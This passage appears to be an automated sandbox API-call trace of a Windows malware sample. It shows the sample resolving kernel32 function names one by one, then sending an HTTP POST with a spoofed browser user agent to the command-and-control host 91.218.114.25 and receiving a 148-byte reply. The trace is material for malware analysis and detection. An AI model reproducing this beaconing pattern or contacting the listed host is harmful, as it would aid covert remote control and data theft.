(lpString="DELETEFILETRANSACTEDW") returned 21 [0179.077] lstrcpyA (in: lpString1=0x31ce648, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0179.077] lstrlenA (lpString="DELETEFILEW") returned 11 [0179.077] lstrcpyA (in: lpString1=0x31ce648, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0179.077] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0179.077] lstrcpyA (in: lpString1=0x31ce648, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0179.077] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0179.077] lstrcpyA (in: lpString1=0x31ce648, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0179.077] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0179.077] lstrcpyA (in: lpString1=0x31ce648, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0179.077] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0179.077] lstrcpyA (in: lpString1=0x31ce648, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0179.077] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0179.077] lstrcpyA (in: lpString1=0x31ce648, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0179.077] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0179.077] lstrcpyA (in: lpString1=0x31ce648, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0179.077] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0179.077] lstrcpyA (in: lpString1=0x31ce648, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0179.077] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0179.077] lstrcpyA (in: lpString1=0x31ce648, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0179.077] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0179.077] lstrcpyA (in: lpString1=0x31ce648, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0179.077] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0179.077] lstrcpyA (in: lpString1=0x31ce648, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0179.077] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0179.077] lstrcpyA (in: lpString1=0x31ce648, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0179.077] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0179.077] lstrcpyA (in: lpString1=0x31ce648, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0179.078] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0179.078] lstrcpyA (in: lpString1=0x31ce648, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0179.078] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0179.078] lstrcpyA (in: lpString1=0x31ce648, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0179.078] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0179.078] lstrcpyA (in: lpString1=0x31ce648, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0179.078] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0179.078] lstrcpyA (in: lpString1=0x31ce648, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0179.078] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0179.078] lstrcpyA (in: lpString1=0x31ce648, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0179.078] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0179.078] lstrcpyA (in: lpString1=0x31ce648, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0179.078] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0179.078] lstrcpyA (in: lpString1=0x31ce648, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0179.078] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0179.078] lstrcpyA (in: lpString1=0x31ce648, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0179.078] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0179.078] lstrcpyA (in: lpString1=0x31ce648, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0179.078] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0179.078] lstrcpyA (in: lpString1=0x31ce648, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0179.078] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0179.078] lstrcpyA (in: lpString1=0x31ce648, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0179.078] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0179.078] lstrcpyA (in: lpString1=0x31ce648, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0179.078] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0179.078] lstrcpyA (in: lpString1=0x31ce648, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0179.078] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0179.078] lstrcpyA (in: lpString1=0x31ce648, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0179.078] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0179.078] lstrcpyA (in: lpString1=0x31ce648, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0179.078] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0179.078] lstrcpyA (in: lpString1=0x31ce648, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0179.078] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0179.078] lstrcpyA (in: lpString1=0x31ce648, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0179.078] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0179.078] lstrcpyA (in: lpString1=0x31ce648, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0179.078] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0179.078] lstrcpyA (in: lpString1=0x31ce648, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0179.078] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0179.079] lstrcpyA (in: lpString1=0x31ce648, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0179.079] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0179.079] lstrcpyA (in: lpString1=0x31ce648, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0179.079] wsprintfA (in: param_1=0x650000, param_2="POST /%s HTTP/1.1\r\nUser-Agent: %s\r\nHost: %s\r\nContent-Type: %s\r\nContent-Length: %d\r\nConnection: Keep-Alive\r\n\r\n" | out: param_1="POST /edit/yelgopvi.do HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko\r\nHost: 91.218.114.25\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 247\r\nConnection: Keep-Alive\r\n\r\n") returned 236 [0179.080] send (s=0x218, buf=0x650000*, len=483, flags=0) returned 483 [0179.080] shutdown (s=0x218, how=1) returned 0 [0179.080] recv (in: s=0x218, buf=0x31cf30c, len=1, flags=0 | out: buf=0x31cf30c*) returned 1 [0179.136] recv (in: s=0x218, buf=0x31cf30d, len=1, flags=0 | out: buf=0x31cf30d*) returned 1 [0179.136] recv (in: s=0x218, buf=0x31cf30e, len=1, flags=0 | out: buf=0x31cf30e*) returned 1 [0179.136] recv (in: s=0x218, buf=0x31cf30f, len=1, flags=0 | out: buf=0x31cf30f*) returned 1 [0179.136] recv (in: s=0x218, buf=0x31cf310, len=1, flags=0 | out: buf=0x31cf310*) returned 1 [0179.137] recv (in: s=0x218, buf=0x31cf311, len=1, flags=0 | out: buf=0x31cf311*) returned 1 [0179.137] recv (in: s=0x218, buf=0x31cf312, len=1, flags=0 | out: buf=0x31cf312*) returned 1 [0179.137] recv (in: s=0x218, buf=0x31cf313, len=1, flags=0 | out: buf=0x31cf313*) returned 1 [0179.137] recv (in: s=0x218, buf=0x31cf314, len=1, flags=0 | out: buf=0x31cf314*) returned 1 [0179.137] recv (in: s=0x218, buf=0x31cf315, len=1, flags=0 | out: buf=0x31cf315*) returned 1 [0179.137] recv (in: s=0x218, buf=0x31cf316, len=1, flags=0 | out: buf=0x31cf316*) returned 1 [0179.137] recv (in: s=0x218, buf=0x31cf317, len=1, flags=0 | out: buf=0x31cf317*) returned 1 [0179.137] recv (in: s=0x218, buf=0x31cf318, len=1, flags=0 | out: buf=0x31cf318*) returned 1 [0179.137] recv (in: s=0x218, buf=0x31cf319, len=1, flags=0 | out: buf=0x31cf319*) returned 1 [0179.137] recv (in: s=0x218, buf=0x31cf31a, len=1, flags=0 | out: buf=0x31cf31a*) returned 1 [0179.137] recv (in: s=0x218, buf=0x31cf31b, len=1, flags=0 | out: buf=0x31cf31b*) returned 1 [0179.137] recv (in: s=0x218, buf=0x31cf31c, len=1, flags=0 | out: buf=0x31cf31c*) returned 1 [0179.137] recv (in: s=0x218, buf=0x31cf31d, len=1, flags=0 | out: buf=0x31cf31d*) returned 1 [0179.137] recv (in: s=0x218, buf=0x31cf31e, len=1, flags=0 | out: buf=0x31cf31e*) returned 1 [0179.138] recv (in: s=0x218, buf=0x31cf31f, len=1, flags=0 | out: buf=0x31cf31f*) returned 1 [0179.138] recv (in: s=0x218, buf=0x31cf320, len=1, flags=0 | out: buf=0x31cf320*) returned 1 [0179.138] recv (in: s=0x218, buf=0x31cf321, len=1, flags=0 | out: buf=0x31cf321*) returned 1 [0179.138] recv (in: s=0x218, buf=0x31cf322, len=1, flags=0 | out: buf=0x31cf322*) returned 1 [0179.138] recv (in: s=0x218, buf=0x31cf323, len=1, flags=0 | out: buf=0x31cf323*) returned 1 [0179.138] recv (in: s=0x218, buf=0x31cf324, len=1, flags=0 | out: buf=0x31cf324*) returned 1 [0179.138] recv (in: s=0x218, buf=0x31cf325, len=1, flags=0 | out: buf=0x31cf325*) returned 1 [0179.138] recv (in: s=0x218, buf=0x31cf326, len=1, flags=0 | out: buf=0x31cf326*) returned 1 [0179.138] recv (in: s=0x218, buf=0x31cf327, len=1, flags=0 | out: buf=0x31cf327*) returned 1 [0179.138] recv (in: s=0x218, buf=0x31cf328, len=1, flags=0 | out: buf=0x31cf328*) returned 1 [0179.139] recv (in: s=0x218, buf=0x31cf329, len=1, flags=0 | out: buf=0x31cf329*) returned 1 [0179.139] recv (in: s=0x218, buf=0x31cf32a, len=1, flags=0 | out: buf=0x31cf32a*) returned 1 [0179.139] recv (in: s=0x218, buf=0x31cf32b, len=1, flags=0 | out: buf=0x31cf32b*) returned 1 [0179.139] recv (in: s=0x218, buf=0x31cf32c, len=1, flags=0 | out: buf=0x31cf32c*) returned 1 [0179.139] recv (in: s=0x218, buf=0x31cf32d, len=1, flags=0 | out: buf=0x31cf32d*) returned 1 [0179.139] recv (in: s=0x218, buf=0x31cf32e, len=1, flags=0 | out: buf=0x31cf32e*) returned 1 [0179.139] recv (in: s=0x218, buf=0x31cf32f, len=1, flags=0 | out: buf=0x31cf32f*) returned 1 [0179.139] recv (in: s=0x218, buf=0x31cf330, len=1, flags=0 | out: buf=0x31cf330*) returned 1 [0179.139] recv (in: s=0x218, buf=0x31cf331, len=1, flags=0 | out: buf=0x31cf331*) returned 1 [0179.139] recv (in: s=0x218, buf=0x31cf332, len=1, flags=0 | out: buf=0x31cf332*) returned 1 [0179.139] recv (in: s=0x218, buf=0x31cf333, len=1, flags=0 | out: buf=0x31cf333*) returned 1 [0179.139] recv (in: s=0x218, buf=0x31cf334, len=1, flags=0 | out: buf=0x31cf334*) returned 1 [0179.139] recv (in: s=0x218, buf=0x31cf335, len=1, flags=0 | out: buf=0x31cf335*) returned 1 [0179.139] recv (in: s=0x218, buf=0x31cf336, len=1, flags=0 | out: buf=0x31cf336*) returned 1 [0179.139] recv (in: s=0x218, buf=0x31cf337, len=1, flags=0 | out: buf=0x31cf337*) returned 1 [0179.140] recv (in: s=0x218, buf=0x31cf338, len=1, flags=0 | out: buf=0x31cf338*) returned 1 [0179.140] recv (in: s=0x218, buf=0x31cf339, len=1, flags=0 | out: buf=0x31cf339*) returned 1 [0179.140] recv (in: s=0x218, buf=0x31cf33a, len=1, flags=0 | out: buf=0x31cf33a*) returned 1 [0179.140] recv (in: s=0x218, buf=0x31cf33b, len=1, flags=0 | out: buf=0x31cf33b*) returned 1 [0179.140] recv (in: s=0x218, buf=0x31cf33c, len=1, flags=0 | out: buf=0x31cf33c*) returned 1 [0179.140] recv (in: s=0x218, buf=0x31cf33d, len=1, flags=0 | out: buf=0x31cf33d*) returned 1 [0179.140] recv (in: s=0x218, buf=0x31cf33e, len=1, flags=0 | out: buf=0x31cf33e*) returned 1 [0179.140] recv (in: s=0x218, buf=0x31cf33f, len=1, flags=0 | out: buf=0x31cf33f*) returned 1 [0179.140] recv (in: s=0x218, buf=0x31cf340, len=1, flags=0 | out: buf=0x31cf340*) returned 1 [0179.140] recv (in: s=0x218, buf=0x31cf341, len=1, flags=0 | out: buf=0x31cf341*) returned 1 [0179.140] recv (in: s=0x218, buf=0x31cf342, len=1, flags=0 | out: buf=0x31cf342*) returned 1 [0179.140] recv (in: s=0x218, buf=0x31cf343, len=1, flags=0 | out: buf=0x31cf343*) returned 1 [0179.140] recv (in: s=0x218, buf=0x31cf344, len=1, flags=0 | out: buf=0x31cf344*) returned 1 [0179.140] recv (in: s=0x218, buf=0x31cf345, len=1, flags=0 | out: buf=0x31cf345*) returned 1 [0179.141] recv (in: s=0x218, buf=0x31cf346, len=1, flags=0 | out: buf=0x31cf346*) returned 1 [0179.141] recv (in: s=0x218, buf=0x31cf347, len=1, flags=0 | out: buf=0x31cf347*) returned 1 [0179.141] recv (in: s=0x218, buf=0x31cf348, len=1, flags=0 | out: buf=0x31cf348*) returned 1 [0179.141] recv (in: s=0x218, buf=0x31cf349, len=1, flags=0 | out: buf=0x31cf349*) returned 1 [0179.141] recv (in: s=0x218, buf=0x31cf34a, len=1, flags=0 | out: buf=0x31cf34a*) returned 1 [0179.141] recv (in: s=0x218, buf=0x31cf34b, len=1, flags=0 | out: buf=0x31cf34b*) returned 1 [0179.141] recv (in: s=0x218, buf=0x31cf34c, len=1, flags=0 | out: buf=0x31cf34c*) returned 1 [0179.141] recv (in: s=0x218, buf=0x31cf34d, len=1, flags=0 | out: buf=0x31cf34d*) returned 1 [0179.141] recv (in: s=0x218, buf=0x31cf34e, len=1, flags=0 | out: buf=0x31cf34e*) returned 1 [0179.141] recv (in: s=0x218, buf=0x31cf34f, len=1, flags=0 | out: buf=0x31cf34f*) returned 1 [0179.141] recv (in: s=0x218, buf=0x31cf350, len=1, flags=0 | out: buf=0x31cf350*) returned 1 [0179.141] recv (in: s=0x218, buf=0x31cf351, len=1, flags=0 | out: buf=0x31cf351*) returned 1 [0179.141] recv (in: s=0x218, buf=0x31cf352, len=1, flags=0 | out: buf=0x31cf352*) returned 1 [0179.141] recv (in: s=0x218, buf=0x31cf353, len=1, flags=0 | out: buf=0x31cf353*) returned 1 [0179.142] recv (in: s=0x218, buf=0x31cf354, len=1, flags=0 | out: buf=0x31cf354*) returned 1 [0179.142] recv (in: s=0x218, buf=0x31cf355, len=1, flags=0 | out: buf=0x31cf355*) returned 1 [0179.142] recv (in: s=0x218, buf=0x31cf356, len=1, flags=0 | out: buf=0x31cf356*) returned 1 [0179.142] recv (in: s=0x218, buf=0x31cf357, len=1, flags=0 | out: buf=0x31cf357*) returned 1 [0179.142] recv (in: s=0x218, buf=0x31cf358, len=1, flags=0 | out: buf=0x31cf358*) returned 1 [0179.142] recv (in: s=0x218, buf=0x31cf359, len=1, flags=0 | out: buf=0x31cf359*) returned 1 [0179.142] recv (in: s=0x218, buf=0x31cf35a, len=1, flags=0 | out: buf=0x31cf35a*) returned 1 [0179.142] recv (in: s=0x218, buf=0x31cf35b, len=1, flags=0 | out: buf=0x31cf35b*) returned 1 [0179.142] recv (in: s=0x218, buf=0x31cf35c, len=1, flags=0 | out: buf=0x31cf35c*) returned 1 [0179.142] recv (in: s=0x218, buf=0x31cf35d, len=1, flags=0 | out: buf=0x31cf35d*) returned 1 [0179.142] recv (in: s=0x218, buf=0x31cf35e, len=1, flags=0 | out: buf=0x31cf35e*) returned 1 [0179.142] recv (in: s=0x218, buf=0x31cf35f, len=1, flags=0 | out: buf=0x31cf35f*) returned 1 [0179.142] recv (in: s=0x218, buf=0x31cf360, len=1, flags=0 | out: buf=0x31cf360*) returned 1 [0179.142] recv (in: s=0x218, buf=0x31cf361, len=1, flags=0 | out: buf=0x31cf361*) returned 1 [0179.142] recv (in: s=0x218, buf=0x31cf362, len=1, flags=0 | out: buf=0x31cf362*) returned 1 [0179.143] recv (in: s=0x218, buf=0x31cf363, len=1, flags=0 | out: buf=0x31cf363*) returned 1 [0179.143] recv (in: s=0x218, buf=0x31cf364, len=1, flags=0 | out: buf=0x31cf364*) returned 1 [0179.143] recv (in: s=0x218, buf=0x31cf365, len=1, flags=0 | out: buf=0x31cf365*) returned 1 [0179.143] recv (in: s=0x218, buf=0x31cf366, len=1, flags=0 | out: buf=0x31cf366*) returned 1 [0179.143] recv (in: s=0x218, buf=0x31cf367, len=1, flags=0 | out: buf=0x31cf367*) returned 1 [0179.143] recv (in: s=0x218, buf=0x31cf368, len=1, flags=0 | out: buf=0x31cf368*) returned 1 [0179.143] recv (in: s=0x218, buf=0x31cf369, len=1, flags=0 | out: buf=0x31cf369*) returned 1 [0179.143] recv (in: s=0x218, buf=0x31cf36a, len=1, flags=0 | out: buf=0x31cf36a*) returned 1 [0179.144] recv (in: s=0x218, buf=0x31cf36b, len=1, flags=0 | out: buf=0x31cf36b*) returned 1 [0179.144] recv (in: s=0x218, buf=0x31cf36c, len=1, flags=0 | out: buf=0x31cf36c*) returned 1 [0179.144] recv (in: s=0x218, buf=0x31cf36d, len=1, flags=0 | out: buf=0x31cf36d*) returned 1 [0179.144] recv (in: s=0x218, buf=0x31cf36e, len=1, flags=0 | out: buf=0x31cf36e*) returned 1 [0179.144] recv (in: s=0x218, buf=0x31cf36f, len=1, flags=0 | out: buf=0x31cf36f*) returned 1 [0179.144] recv (in: s=0x218, buf=0x31cf370, len=1, flags=0 | out: buf=0x31cf370*) returned 1 [0179.144] recv (in: s=0x218, buf=0x31cf371, len=1, flags=0 | out: buf=0x31cf371*) returned 1 [0179.144] recv (in: s=0x218, buf=0x31cf372, len=1, flags=0 | out: buf=0x31cf372*) returned 1 [0179.144] recv (in: s=0x218, buf=0x31cf373, len=1, flags=0 | out: buf=0x31cf373*) returned 1 [0179.144] recv (in: s=0x218, buf=0x31cf374, len=1, flags=0 | out: buf=0x31cf374*) returned 1 [0179.144] recv (in: s=0x218, buf=0x31cf375, len=1, flags=0 | out: buf=0x31cf375*) returned 1 [0179.144] recv (in: s=0x218, buf=0x31cf376, len=1, flags=0 | out: buf=0x31cf376*) returned 1 [0179.144] recv (in: s=0x218, buf=0x31cf377, len=1, flags=0 | out: buf=0x31cf377*) returned 1 [0179.144] recv (in: s=0x218, buf=0x31cf378, len=1, flags=0 | out: buf=0x31cf378*) returned 1 [0179.145] recv (in: s=0x218, buf=0x31cf379, len=1, flags=0 | out: buf=0x31cf379*) returned 1 [0179.145] recv (in: s=0x218, buf=0x31cf37a, len=1, flags=0 | out: buf=0x31cf37a*) returned 1 [0179.145] recv (in: s=0x218, buf=0x31cf37b, len=1, flags=0 | out: buf=0x31cf37b*) returned 1 [0179.145] recv (in: s=0x218, buf=0x31cf37c, len=1, flags=0 | out: buf=0x31cf37c*) returned 1 [0179.145] recv (in: s=0x218, buf=0x31cf37d, len=1, flags=0 | out: buf=0x31cf37d*) returned 1 [0179.145] recv (in: s=0x218, buf=0x31cf37e, len=1, flags=0 | out: buf=0x31cf37e*) returned 1 [0179.145] recv (in: s=0x218, buf=0x31cf37f, len=1, flags=0 | out: buf=0x31cf37f*) returned 1 [0179.145] recv (in: s=0x218, buf=0x31cf380, len=1, flags=0 | out: buf=0x31cf380*) returned 1 [0179.145] recv (in: s=0x218, buf=0x31cf381, len=1, flags=0 | out: buf=0x31cf381*) returned 1 [0179.145] recv (in: s=0x218, buf=0x31cf382, len=1, flags=0 | out: buf=0x31cf382*) returned 1 [0179.145] recv (in: s=0x218, buf=0x31cf383, len=1, flags=0 | out: buf=0x31cf383*) returned 1 [0179.145] recv (in: s=0x218, buf=0x31cf384, len=1, flags=0 | out: buf=0x31cf384*) returned 1 [0179.145] recv (in: s=0x218, buf=0x31cf385, len=1, flags=0 | out: buf=0x31cf385*) returned 1 [0179.145] recv (in: s=0x218, buf=0x31cf386, len=1, flags=0 | out: buf=0x31cf386*) returned 1 [0179.146] recv (in: s=0x218, buf=0x31cf387, len=1, flags=0 | out: buf=0x31cf387*) returned 1 [0179.146] recv (in: s=0x218, buf=0x31cf388, len=1, flags=0 | out: buf=0x31cf388*) returned 1 [0179.146] recv (in: s=0x218, buf=0x31cf389, len=1, flags=0 | out: buf=0x31cf389*) returned 1 [0179.146] recv (in: s=0x218, buf=0x31cf38a, len=1, flags=0 | out: buf=0x31cf38a*) returned 1 [0179.146] recv (in: s=0x218, buf=0x31cf38b, len=1, flags=0 | out: buf=0x31cf38b*) returned 1 [0179.146] recv (in: s=0x218, buf=0x31cf38c, len=1, flags=0 | out: buf=0x31cf38c*) returned 1 [0179.146] recv (in: s=0x218, buf=0x31cf38d, len=1, flags=0 | out: buf=0x31cf38d*) returned 1 [0179.146] recv (in: s=0x218, buf=0x31cf38e, len=1, flags=0 | out: buf=0x31cf38e*) returned 1 [0179.146] recv (in: s=0x218, buf=0x31cf38f, len=1, flags=0 | out: buf=0x31cf38f*) returned 1 [0179.146] recv (in: s=0x218, buf=0x31cf390, len=1, flags=0 | out: buf=0x31cf390*) returned 1 [0179.146] recv (in: s=0x218, buf=0x31cf391, len=1, flags=0 | out: buf=0x31cf391*) returned 1 [0179.146] recv (in: s=0x218, buf=0x31cf392, len=1, flags=0 | out: buf=0x31cf392*) returned 1 [0179.146] recv (in: s=0x218, buf=0x31cf393, len=1, flags=0 | out: buf=0x31cf393*) returned 1 [0179.146] recv (in: s=0x218, buf=0x31cf394, len=1, flags=0 | out: buf=0x31cf394*) returned 1 [0179.146] recv (in: s=0x218, buf=0x31cf395, len=1, flags=0 | out: buf=0x31cf395*) returned 1 [0179.147] recv (in: s=0x218, buf=0x31cf396, len=1, flags=0 | out: buf=0x31cf396*) returned 1 [0179.147] recv (in: s=0x218, buf=0x31cf397, len=1, flags=0 | out: buf=0x31cf397*) returned 1 [0179.147] recv (in: s=0x218, buf=0x31cf398, len=1, flags=0 | out: buf=0x31cf398*) returned 1 [0179.147] recv (in: s=0x218, buf=0x31cf399, len=1, flags=0 | out: buf=0x31cf399*) returned 1 [0179.147] recv (in: s=0x218, buf=0x31cf39a, len=1, flags=0 | out: buf=0x31cf39a*) returned 1 [0179.147] recv (in: s=0x218, buf=0x31cf39b, len=1, flags=0 | out: buf=0x31cf39b*) returned 1 [0179.147] recv (in: s=0x218, buf=0x31cf39c, len=1, flags=0 | out: buf=0x31cf39c*) returned 1 [0179.147] recv (in: s=0x218, buf=0x31cf39d, len=1, flags=0 | out: buf=0x31cf39d*) returned 1 [0179.147] recv (in: s=0x218, buf=0x31cf39e, len=1, flags=0 | out: buf=0x31cf39e*) returned 1 [0179.147] recv (in: s=0x218, buf=0x31cf39f, len=1, flags=0 | out: buf=0x31cf39f*) returned 1 [0179.147] recv (in: s=0x218, buf=0x31cf3a0, len=1, flags=0 | out: buf=0x31cf3a0*) returned 1 [0179.147] recv (in: s=0x218, buf=0x31cf3a1, len=1, flags=0 | out: buf=0x31cf3a1*) returned 1 [0179.147] recv (in: s=0x218, buf=0x31cf3a2, len=1, flags=0 | out: buf=0x31cf3a2*) returned 1 [0179.147] recv (in: s=0x218, buf=0x31cf3a3, len=1, flags=0 | out: buf=0x31cf3a3*) returned 1 [0179.148] recv (in: s=0x218, buf=0x31cf3a4, len=1, flags=0 | out: buf=0x31cf3a4*) returned 1 [0179.148] recv (in: s=0x218, buf=0x31cf3a5, len=1, flags=0 | out: buf=0x31cf3a5*) returned 1 [0179.148] recv (in: s=0x218, buf=0x31cf3a6, len=1, flags=0 | out: buf=0x31cf3a6*) returned 1 [0179.148] recv (in: s=0x218, buf=0x31cf3a7, len=1, flags=0 | out: buf=0x31cf3a7*) returned 1 [0179.148] recv (in: s=0x218, buf=0x31cf3a8, len=1, flags=0 | out: buf=0x31cf3a8*) returned 1 [0179.148] recv (in: s=0x218, buf=0x31cf3a9, len=1, flags=0 | out: buf=0x31cf3a9*) returned 1 [0179.148] recv (in: s=0x218, buf=0x31cf3aa, len=1, flags=0 | out: buf=0x31cf3aa*) returned 1 [0179.148] recv (in: s=0x218, buf=0x31cf3ab, len=1, flags=0 | out: buf=0x31cf3ab*) returned 1 [0179.148] recv (in: s=0x218, buf=0x31cf3ac, len=1, flags=0 | out: buf=0x31cf3ac*) returned 1 [0179.148] recv (in: s=0x218, buf=0x31cf3ad, len=1, flags=0 | out: buf=0x31cf3ad*) returned 1 [0179.148] recv (in: s=0x218, buf=0x31cf3ae, len=1, flags=0 | out: buf=0x31cf3ae*) returned 1 [0179.148] StrToIntA (lpSrc="148") returned 148 [0179.148] VirtualAlloc (lpAddress=0x0, dwSize=0x94, flAllocationType=0x3000, flProtect=0x4) returned 0x6a0000 [0179.149] recv (in: s=0x218, buf=0x6a0000, len=148, flags=0 | out: buf=0x6a0000*) returned 148 [0179.149] VirtualFree (lpAddress=0x630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0179.149] VirtualFree (lpAddress=0x640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0179.149] VirtualFree (lpAddress=0x650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0179.149] closesocket (s=0x218) returned 0 [0179.150] WSACleanup () returned 0 [0179.197] VirtualFree (lpAddress=0x610000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0179.197] VirtualFree (lpAddress=0x620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0179.197] VirtualFree (lpAddress=0x600000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0179.197] VirtualFree (lpAddress=0x5c0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0179.198] VirtualFree (lpAddress=0x5e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0179.198] VirtualFree (lpAddress=0x6a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0179.198] VirtualFree (lpAddress=0x3a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0179.198] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x3a0000 [0179.198] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x5c0000 [0179.199] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0x5e0000 [0179.199] GetTickCount () returned 0x11343f3 [0179.199] GetTickCount () returned 0x11343f3 [0179.199] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x600000 [0179.199] lstrlenA (lpString="kernel32.dll") returned 12 [0179.199] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x77110000 [0179.199] lstrcpyA (in: lpString1=0x31cec6c, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0179.199] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0179.199] lstrcpyA (in: lpString1=0x31cec6c, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0179.199] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0179.199] lstrcpyA (in: lpString1=0x31cec6c, 